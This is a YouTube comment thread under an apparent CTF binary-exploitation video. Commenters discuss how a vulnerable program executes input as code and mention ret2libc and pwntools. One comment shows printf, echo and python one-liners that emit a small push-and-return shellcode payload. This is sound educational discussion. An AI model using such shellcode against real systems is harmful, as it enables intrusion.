As a computer science student, i rly enjoy your content
@mucktheman27206 жыл бұрын
I highly recommend using ipython shell instead of python shell as it makes it easier to explore all the cool things that different python objects can do. Tab complete is one of the best features when working with new modules and ipython gives you that ability. :D
@zanidd6 жыл бұрын
and yet I'm sitting here, manually writing/translating the adresses, while pwn tools reduces the amount of work involved. Cool video
@SlyFluffyFox3 жыл бұрын
Nice video man
@X3eRo06 жыл бұрын
It was amazing
@IdanBanani4 жыл бұрын
5:52 how does pushing the function(symbol) address and returning (from main() ?) results in calling the function? Can we also use Call / other method?. I just know that the returned value should be stored at EAX
@JackDjTom66 жыл бұрын
Pls continue the python challenge ^^
@oneloveafrica8860 Жыл бұрын
how? without knowing return address ??where do u execute the code?????????????????/
@austinmurphy90746 ай бұрын
the vuln() function (shown in source code @1:48) has the lines void (*func)() = (void (*)())stuff; func(); Anything you pass to the program will be interpreted, cast to a function and executed
@TheNecromorfe6 жыл бұрын
It is possible to resolve with r2libc?
@_JohnHammond6 жыл бұрын
A return2libc attack? I'm not any expert here but I am sure you could do that, if you could got your shellcode to return back to libc or did some ROP thing. There are probably some options for going with that approach, but admittedly I don't have any solid ideas off the top of my head.
@ponysopher6 жыл бұрын
I tried to do this on my own and wrote shellcode for a direct call to the win function at its address rather than pushing the address. That resulted in a segfault. Does anyone know why?
@mucktheman27206 жыл бұрын
There's a problem with a lot of print methods (like pythons print and the echo shell command) that append a newline character to the string. I'd recommend using printf instead if at all possible as it doesn't pollute your output with newlines or other crap. Examples below, and notice the extra crap you get with python and echo. printf 'h@\x85\x04\x08\xc3' |hexdump -b 0000000 150 100 205 004 010 303 0000006 echo -e 'h@\x85\x04\x08\xc3' |hexdump -b 0000000 150 100 205 004 010 303 012 0000007 python -c 'print "h@\x85\x04\x08\xc3"' |hexdump -b 0000000 150 100 205 004 010 303 012 0000007